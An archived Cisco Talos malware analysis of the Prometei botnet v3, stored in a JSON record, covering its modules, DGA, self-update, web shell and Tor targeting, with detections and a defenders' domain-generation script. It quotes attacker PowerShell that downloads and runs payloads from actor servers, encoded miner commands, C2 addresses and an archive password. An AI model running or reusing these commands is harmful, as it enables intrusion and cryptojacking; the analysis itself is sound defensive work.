{
	"id": "d24853e9-3c5e-47db-a1cd-92e40970a4b6",
	"created_at": "2026-04-06T00:13:56.241609Z",
	"updated_at": "2026-04-10T13:11:28.377648Z",
	"deleted_at": null,
	"sha1_hash": "296541075e3750d6171a4436c8a7862573ae943b",
	"title": "Prometei botnet improves modules and exhibits new capabilities in recent updates",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1053226,
	"plain_text": "Prometei botnet improves modules and exhibits new capabilities in\r\nrecent updates\r\nBy Andrew Windsor\r\nPublished: 2023-03-09 · Archived: 2026-04-05 13:30:10 UTC\r\nThursday, March 9, 2023 08:02\r\nPrometei botnet continued its activity since Cisco Talos first reported about it in 2020.  Since November\r\n2022, we have observed Prometei improving the infrastructure components and capabilities. More\r\nspecifically, the botnet operators updated certain submodules of the execution chain to automate processes\r\nand challenge forensic analysis methods.\r\nWe assess with high confidence that v3 of the Prometei botnet is of medium size, with more than 10,000\r\ninfected systems worldwide, based on data obtained by sinkholing the DGA domains over a period of one\r\nweek in February 2023.\r\nBased on open-source intelligence, the actors have also been actively spreading improved Linux versions\r\nof the Prometei bot, continuously improving the current version, v3.\r\nWe have observed previously undocumented functionality, including an alternative C2 domain generating\r\nalgorithm (DGA), a self-updating mechanism, and a bundled version of the Apache Webserver with a web\r\nshell that’s deployed onto victim hosts, improving the overall technical capabilities of the botnet.\r\nAdditionally, the bot’s targeting may have been influenced by the war in Ukraine. The only excluded\r\ncountry in the Tor configuration is Russia, as supposed to earlier variants, which also avoided exit nodes in\r\nother CIS countries.\r\nPrometei, a highly modular botnet with worm-like capabilities that primarily deploys the Monero cryptocurrency\r\nminer, has been continuously improved and updated since it was first seen in 2016, posing a persistent threat to\r\norganizations. Talos first analyzed this threat in our 2020 blog post, highlighting its large repertoire of modules,\r\nmultiple methods of spreading, and continuous development. In our initial analysis and current activity tracking\r\nthat began in November 2022, we observed Prometei deploying Windows-based tools and malware and other\r\nLinux versions observed by security researchers.\r\nTalos observed Prometei’s cryptocurrency mining and credential theft activity to be financially motivated and\r\ngeographically indiscriminate. Its infections are likely opportunistic, targeting vulnerable entities in all regions\r\nand industry verticals to support a higher yield of harvested credentials and mining of the Monero cryptocurrency.\r\nPrometei victimology\r\nWe assess with high confidence that the Prometei v3 botnet is of medium size, with approximately 10,000 infected\r\nsystems worldwide, based on data acquired by sinkholing the DGA domains over a period of one week in\r\nFebruary.\r\nhttps://blog.talosintelligence.com/prometei-botnet-improves/\r\nPage 1 of 13\n\nThe geographical distribution of infected systems shows a uniform distribution proportional to the population of\r\nthe countries, with traffic captured from 155 countries. As expected with a uniform distribution, the most populous\r\ncountries have the largest number of infected systems, with the exception of Brazil, Indonesia and Turkey\r\ndisplaying a higher proportion of infections compared to those countries’ populations.\r\nA single country that stands out is Russia, with a disproportionately smaller number of infections, accounting for\r\n0.31 percent of all infected systems, supporting our assessment of the bot’s targeting being influenced by the\r\nRussia-Ukraine conflict based on its Tor configuration.\r\nWe assess the Prometei threat remains ongoing and will evolve for the foreseeable future. Its common C2\r\ninfrastructure continues to show a steady stream of activity, while the operators consistently rotate its malware and\r\ncryptomining hosts. Their regular updating and expansion of Prometei’s modules demonstrate commitment and\r\ntechnical knowledge that will enable them to continue proliferating the botnet to new victims and adapting to new\r\ndefenses and protections. The noted addition of backdoor capabilities to sqhost.exe by our previous research and\r\nthe inclusion of a bundled web shell in our current observations could indicate the operators are adding persistence\r\nmeasures to keep Prometei active on targeted machines, or a gradual shift or expansion to other types of payloads\r\nand activity.\r\nUpdates to Prometei’s common execution chain demonstrate improved capabilities\r\nTalos’ analysis of the botnet’s execution chain revealed that, while some infrastructure components remain\r\nunchanged from our 2020 reporting, the Prometei operators have made modifications that automate component\r\nand infrastructure updating, impair defenders’ analysis, and further entrench the actor on victim machines. We\r\nobserved the execution chain and subsequent actions performed by the botnet were initiated by a malicious\r\nPowerShell command that downloaded the primary listening and execution module, referred to throughout as\r\n“sqhost.exe.” It generally resembles some form of the following:\r\nhttps://blog.talosintelligence.com/prometei-botnet-improves/\r\nPage 2 of 13\n\ncmd /C echo 123\u003eC:\\Windows\\mshlpda32.dll\u0026powershell $p='C:\\windows\\zsvc.exe';(New-Object Net.WebClient).Downloa\r\nAs the above command illustrates, the primary module is downloaded from an actor-controlled server in an\r\nencrypted form through a simple XOR byte alteration pattern. Its initial location on the hard drive is\r\n“C:\\windows\\zsvc.exe” and is executed through the PowerShell cmdlet “Start-Process”.\r\nFollowing the primary module’s download, additional commands establish persistence on the victim machine and\r\nensure the bot can communicate with the C2 server. A firewall rule named “Secure Socket Tunneling Protocol\r\n(HTTP)” is executed through the “netsh” command to add “C:\\Windows\\sqhost.exe” to the allowed programs list.\r\nPersistence is obtained by creating an automated system service named “UPlugPlay,” which executes sqhost.exe\r\nwith the argument “Dcomsvc”. The original downloaded file is then renamed from “zsvc.exe” to “sqhost.exe.”\r\nOnce the primary Prometei module is hooked into the victim’s system, the majority of its capabilities are derived\r\nfrom several additional components that are downloaded to the victim host and retrieved through additional\r\nPowerShell commands. This activity was observed immediately following the establishment of sqhost.exe on the\r\nsystem. Many of the rest of Prometei’s components are delivered and updated in bulk through 7-Zip archive files.\r\nThe bot first checks if the expected 7-Zip executable “7z.exe” and shared library “7z.dll” resources already exist\r\non the system. If not, the executable file and shared library are remotely downloaded from a C2 server.\r\nUsing a similar PowerShell-based command, the bot downloads a 7z archive named “std.7z,” which contains\r\nnumerous shared library files for some common development packages used by Prometei’s components, such as\r\nthe GCC compiler (libgcc), an asynchronous event processor (libevent), the .NET Security interface, and a .NET\r\nconnector to PostgresSQL (npgsql). It also contains the following primary support modules:\r\n“rdpCIip.exe”\r\nhttps://blog.talosintelligence.com/prometei-botnet-improves/\r\nPage 3 of 13\n\n“miwalk.exe”\r\n“windrlver.exe”\r\n“nethelper2.exe” and “nethelper4.exe”\r\n“smcard.exe”\r\n“msdtc.exe”\r\nTalos observed the primary support modules in the above list, which have consistently been a part of previously\r\nobserved instances of the Prometei botnet and a less frequently seen module named “bklocal.exe.” The file\r\n“rdpCIip.exe” (named with a capital ‘i’ rather than a lowercase ‘l’) acts as a spreader program through Server\r\nMessage Block (SMB) and is used alongside its partner component “miwalk.exe”, which is a version of Mimikatz\r\nused for credential harvesting. A remote desktop protocol (RDP)-based spreading module, “bklocal2.exe” and\r\n“bklocal4.exe”, exploits the BlueKeep vulnerability (CVE-2019-0708) that affects older versions of Windows.\r\nThis module has been deployed less frequently but can be observed being downloaded separately.\r\nThe bot attempts to spread via SSH through the “windrLver.exe” SSH client. The executables with the “nethelper”\r\nnames are .NET-based assemblies for lateral movement that attempt to locate and connect to any SQL servers\r\nfound in the network environment. Upon successful connection, the executables attempt to install sqhost.exe onto\r\nthe server. The final two modules, “smcard.ext” and “msdtc.exe”, deal with the bot’s communications over the Tor\r\nnetwork, with the C2’s Tor address represented by the hardcoded URL in sqhost.exe and “onion” TLD:\r\n“hxxps://gb7ni5rgeexdcncj[.]onion/cgi-bin/prometei.cgi”.\r\nThe actual cryptocurrency mining payload is also retrieved remotely as “srch.7z”, but is written to disk as\r\n“SearchIndexer.exe”. The PowerShell command that downloads SearchIndexer.exe is similar to the one that drops\r\nthe primary component sqhost.exe. First, a check is performed that identifies if the same 7-Zip components are\r\npresent on the system and downloads them if not. The encryption method to obfuscate SearchIndexer.exe does,\r\nhowever, differ. Rather than encrypting the payload through XOR byte manipulation, it is encrypted through its\r\nparent password-protected 7-Zip archive. The password “horhor123” is visible in the PowerShell command and\r\nremains unchanged from our previous reporting. The miner configuration attributes are provided by the C2\r\nthrough a downloaded text file named “desktop.txt”, written to disk at “C:\\Windows\\dell\\desktop.dat”.\r\nWe also observed a few actions related to the miner. The call to actually begin mining can be seen in\r\nSearchIndexer.exe’s invocation on the command line, which also contains the Monero wallet associated with the\r\nPrometei actor:\r\nsearchindexer.exe -o stratum+tcp://103.65.236[.]53:80 -u 4A1txQ9L8h8NqF4EtGsZDP5vRN3yTVKynbkyP1jvCiDajNLPepPbBd\r\nThe actor issues commands to replace the command template in desktop.dat with a newly identified base64-\r\nencoded command. Two commands we observed were:\r\npowershell.exe $d=[System.Convert]::FromBase64String('LW8gc3RyYXR1bSt0Y3A6Ly8yMjEuMTIwLjE0NC4xMDE6MzMzMyAtLWRvb\r\n“-o stratum+tcp://221.120.144[.]101:3333 --donate-level 1 -p x -u id”\r\nand\r\nhttps://blog.talosintelligence.com/prometei-botnet-improves/\r\nPage 4 of 13\n\npowershell.exe $d=[System.Convert]::FromBase64String('LW8gc3RyYXR1bSt0Y3A6Ly8xNzcuNzMuMjM3LjU1OjgwIC0tZG9uYXRlLW\r\n“-o stratum+tcp://177.73.237[.]55:80 --donate-level 1 -p x -u id”\r\nThe purpose and usage of all of the submodules were analyzed more in-depth in Talos’ 2020 blog post and by\r\nsecurity firm Cybereason in April 2021. They are summarized above for the sake of brevity. For a lengthier\r\ntechnical breakdown of these components and commonly observed Prometei execution chain, we recommend\r\nreferring back to these reports.\r\nNewly identified TTPs show operators’ continuous efforts to improve the botnet\r\nTalos identified new Prometei TTPs that expand the botnet’s capabilities and, at the time of writing, have yet to be\r\nhighlighted in open-source reporting. This recent addition of new capabilities aligns with threat researchers’\r\nprevious assertions that the Prometei operators are continuously updating the botnet and adding functionality. In\r\nparticular, Talos has discovered and analyzed a domain generation algorithm previously unseen in Prometei, the\r\naddition of a self-updating mechanism, new bot commands that can be used and the deployment of a bundled\r\nversion of the Apache Webserver with a PHP-based web shell onto victim hosts.\r\nDomain-generating algorithm for alternative C2\r\nTalos observed a new functionality that generates pseudo-random-looking domains. A simple domain-generating\r\nalgorithm (DGA) is used to generate up to 48 new domains per day that can be used for command and control\r\n(C2) servers.\r\nThe domain name itself is generated from the string “xinchao”, followed by six pseudo-random characters based\r\non the current local date. Additionally, the suffix of the top-level domains (TLD) is rotated between .com, .net, and\r\n.org. For example, we observed some of the following used in nslookup calls within telemetry:\r\nxinchaodbcdbh[.]org\r\nxinchaodbcdbh[.]com\r\nxinchaoabcdcf[.]org\r\nxinchaocecclk[.]org\r\nxinchaocecclk[.]net\r\nWe have included a simple Python script to help with discovering domains that Prometei v3 will generate. The\r\nscript takes a date in ISO format as an input and generates 48 possible domains for that date.\r\nhttps://blog.talosintelligence.com/prometei-botnet-improves/\r\nPage 5 of 13\n\nApart from the standard DNS resolver for the generated domains, the “nslookup” command was executed with a\r\npattern-generated domain name, as well as with a server parameter “8[.]8.8.8” in order to specifically use\r\nGoogle’s public DNS. This call is visible on the command line as follows:\r\nnslookup -type=all xinchaocecclk[.]com 8[.]8.8.8\r\nA side effect of this is that nslookup calls act as a timing delay tactic that's relatively obscure to general users\r\nauditing their command logs. When the aforementioned domains are used with the nslookup command, the lookup\r\nessentially causes a timeout when it is unable to resolve the IP address.\r\nSelf-updating mechanism\r\nhttps://blog.talosintelligence.com/prometei-botnet-improves/\r\nPage 6 of 13\n\nAnother evolution of the Prometei botnet is what appears to be an expanded self-updating capability. The bot\r\nissues a PowerShell command with embedded base64-encoded bytes, which is written to the batch file in the bot’s\r\ncommon directory at “C:\\Windows\\dell\\walker_updater.cmd” and then executed. This batch file will run similar\r\nchecks as seen in the previous activity that looks for the presence of “sqhost.exe” and the 7-Zip utilities and\r\ndownloads them if they aren’t detected. The batch script also issues additional PowerShell commands to download\r\na 7z file from the C2 server named “update.7z”, which is encrypted with the common actor password\r\n“horhor123”. Its contents are extracted and another contained batch file, “install.cmd”, is executed.\r\nThe update.7z archive contains replications as well as potentially different variants of Prometei’s common\r\ncomponents, such as sqhost.exe, netwalker.exe, and the service configuration “uplugplay”, among others. It also\r\ncontains two 7-Zip archives named “updates1_new” and “updates2_new”, which are encoded with a new\r\npassword string “xinchao123” similar in composition to the aforementioned DGA domain generation. Further\r\nextracting these archives yields duplicate and different versions of the shared library files and spreader programs,\r\ndepending on which version of the archive is downloaded. For example, in a later update call from a different C2,\r\nTalos observed a 32-bit and 64-bit version of the Mimikatz variant “miWalk” included, while some subsequent\r\ndownloads of the update archive only included the 64-bit version.\r\nThe install.cmd batch file, invoked by the parent batch file walker_update.cmd, is a fairly straightforward delete-substitution update of the relevant files. In the samples analyzed, the script first attempts to kill the rdpCIip.exe\r\nand winDrLver.exe spreader programs. It then deletes all current versions of the target files on disk and then\r\nrenames the extracted versions, which contain an additional appendage of “_new” to their filename, the same as\r\nthe deleted files effectively supplanting them. Finally, the install.cmd script cleans up any remaining extracted\r\nfiles from update.7z not used in the update cycle.\r\nPreviously undocumented Prometei bot commands\r\nApart from the C2 commands that are already described in detail in other posts, version 3 of the Prometei bot\r\ncontains several previously undocumented commands that the adversary could use to control the infected system.\r\nCommand Functionality\r\nfchk Check if a file is locked by a process and the file’s owner. \r\nfget Upload a file to c2\r\nfdir Get current directory\r\ncall Execute a program, create pipes to redirect stdin and stdout for input and output. \r\nhttps://blog.talosintelligence.com/prometei-botnet-improves/\r\nPage 7 of 13\n\nsendstr Send a supplied argument string into the keyboard input buffer\r\ndclick Mouse double click on a screen position\r\nlclick Mouse left click on a screen position\r\nrclick Mouse right click on a screen position\r\nclipcopy Get clipboard data\r\nclipsend Set clipboard data\r\nwinr Press win+r, open run box\r\npresskey Press a virtual keyboard key\r\nfdel Delete file\r\nfsha256 Calculate sha256 checksum of a file\r\nThe execution flow for the main module is very similar to previous variants. The main body of the bot is\r\nencrypted and the initialization of the encryption keys is dependent on the content of an external file created prior\r\nto the main module execution. If the initialization is successful, the main body of the bot will be executed, and if it\r\nfails, a decoy functionality will be executed.\r\nhttps://blog.talosintelligence.com/prometei-botnet-improves/\r\nPage 8 of 13\n\nSuccessful execution of the bot depends on the content of an external file.\r\nApache webserver/web shell\r\nFinally, Talos observed the Prometei bot dropping a compressed archive, named “AppServ180.zip”, which\r\ncontains a version of the Apache Web Server bundled with a simple PHP-based web shell. Similar to other\r\ncomponent downloads by Prometei, the PowerShell call that drops this piece checks for the existence of 7-Zip\r\nbefore downloading AppServ180.zip from an actor-controlled host. The script then creates the following\r\ndirectories: “C:\\ProgramData\\Microsoft\\AppServ” and “C:\\ProgramData\\Microsoft\\AppServ\\cgi-bin”.\r\nInstallation of Apache web server and the PHP web shell file.\r\nIn a separate PowerShell command, the PHP file, “C:\\ProgramData\\Microsoft\\AppServ\\www\\ssimple.php”, is\r\nrenamed to a new filename consisting of “Shell-” and 12 randomly generated alphanumeric characters plus\r\n“.php”. This PHP file contains the simple web shell code that receives base64-encoded commands executed\r\nthrough PHP’s “system” function and a file upload-copy ability.\r\nhttps://blog.talosintelligence.com/prometei-botnet-improves/\r\nPage 9 of 13\n\nInstalled web shell PHP code.\r\nAn additional Windows service is created under the name “KtmRmSvc” consisting of an auto process start for the\r\nexecutable in the AppServ subdirectory “Apache2.2\\bin\\taskhost.exe”. Despite its shared naming of a common\r\nWindows system executable, this file is actually a renamed “httpd.exe”, which is the HTTP daemon for the\r\nApache Server. By renaming the Apache daemon to a common system file, it is highly likely that the actor\r\nmanaging Prometei is hoping to prevent system owners and admins from noticing a web server running on their\r\nhost through some simplistic obfuscation of the running process name. While the inclusion of the packaged web\r\nshell was observed in the activity starting on Nov. 19, 2022, the existence of the archive file itself was first seen in\r\nVirusTotal on March 3, 2021, when its only submission was provided by a user in Japan. Given the Prometei\r\nactor’s propensity to swap components in and out, as well as iteratively update them, it is probable that the actor\r\nmay have been testing their web shell and/or deploying it situationally in other infection attempts, but we do not\r\ncurrently have any direct evidence to confirm or refute this.\r\nPrometei targeting now only excludes Russia\r\nIn analyzing our updated version of Prometei’s Tor proxy, “msdtc.exe”, we observed this configuration has been\r\nrecently updated to only exclude Russia, a change potentially made in response to the Russia-Ukraine war. In\r\nCybereason’s 2021 reporting, their researchers suggested that Prometei could be Russia-based, as the actor had\r\nconfigurations that excluded Tor exit nodes from Russia, Ukraine, Belarus, and Kazakhstan. Our recent analysis\r\nnot only corroborates Cybereason’s assessment that the operators are Russia-based but highlights a shift in\r\nPrometei’s current observed behavior.\r\nMsdtc.exe Tor connection module contains configuration to exclude Russian exit nodes.\r\nhttps://blog.talosintelligence.com/prometei-botnet-improves/\r\nPage 10 of 13\n\nPrior to Russia’s invasion of Ukraine, the actor avoided targeting Russia and many of its border states, whereas\r\nnow, they only avoid targeting Russia. This may indicate a desire to limit the infection of and/or communication to\r\nany Russian hosts by the botnet’s author, and that previously excluded border states are now fair game.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically\r\nand alerts users of potentially unwanted activity on every connected device.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nThe following Snort SIDs can defend against this threat: 54610 - 54612 and 61426-61429.\r\nhttps://blog.talosintelligence.com/prometei-botnet-improves/\r\nPage 11 of 13\n\nThe following ClamAV signatures are applicable to this threat:\r\nWin.Trojan.MSShellcode-6\r\nWin.Coinminer.Generic-7151250-0\r\nWin.Malware.Tgqv7oji-9939403-0\r\nWin.Trojan.Mimikatz-6466236-0\r\nWin.Trojan.Prometei-8977166-0\r\nATT\u0026CK Techniques\r\nResource Development\r\nT1584.005 Compromise Infrastructure: Botnet\r\nExecution\r\nT1059.001 Command and Scripting Interpreter: PowerShell\r\nT1569.002 System Services: Service Execution\r\nPersistence\r\nT1505.003 Server Software Component: Webshell\r\nEvasion\r\nT1027 Obfuscated Files or Information\r\nT1036 Masquerading\r\nT1070.004 Indicator Removal on Host: File Deletion\r\nT1140 Deobfuscate/Decode Files or Information\r\nT1562 Impair Defenses\r\nLateral Movement\r\nT1210 Exploitation of Remote Services\r\nCommand and Control\r\nT0884 Connection Proxy\r\nT1090.003 Proxy: Multi-hop Proxy\r\nT1105 Ingress Tool Transfer\r\nIndicators of Compromise\r\nhttps://blog.talosintelligence.com/prometei-botnet-improves/\r\nPage 12 of 13\n\nIndicators of Compromise associated with this threat can be found here.\r\nPrometei DGA script\r\n#!/usr/bin/env python3\r\nfrom datetime import datetime\r\nimport sys\r\ndef genPrometeiDomains (basedate=datetime.now(), basestring='xinchao'):\r\n month = basedate.strftime(\"%m\")\r\n day_year = basedate.strftime(\"%d%y\")\r\n basedomain=''\r\n generateddomains=[]\r\n for i in range(len(day_year)):\r\n basedomain=basedomain+chr(ord(day_year[i]) + 0x31)\r\n \r\n basedomain=basedomain+chr(int(month)+0x61)\r\n \r\n for i in range(16):\r\n for tld in ['.net','.org','.com']:\r\n domain=basestring+basedomain+chr(i + 0x61)\r\n generateddomains.append(domain+tld)\r\n return '\\n'.join(generateddomains)\r\nif __name__ == \"__main__\":\r\ntry:\r\n print(genPrometeiDomains(datetime.fromisoformat(sys.argv[1])))\r\nexcept IndexError:\r\n print(genPrometeiDomains())\r\nexcept ValueError:\r\n print(\"The date must be specified using the ISO format yyyy-mm-dd\")\r\nSource: https://blog.talosintelligence.com/prometei-botnet-improves/\r\nhttps://blog.talosintelligence.com/prometei-botnet-improves/\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.talosintelligence.com/prometei-botnet-improves/"
	],
	"report_names": [
		"prometei-botnet-improves"
	],
	"threat_actors": [],
	"ts_created_at": 1775434436,
	"ts_updated_at": 1775826688,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/296541075e3750d6171a4436c8a7862573ae943b.pdf",
		"text": "https://archive.orkl.eu/296541075e3750d6171a4436c8a7862573ae943b.txt",
		"img": "https://archive.orkl.eu/296541075e3750d6171a4436c8a7862573ae943b.jpg"
	}
}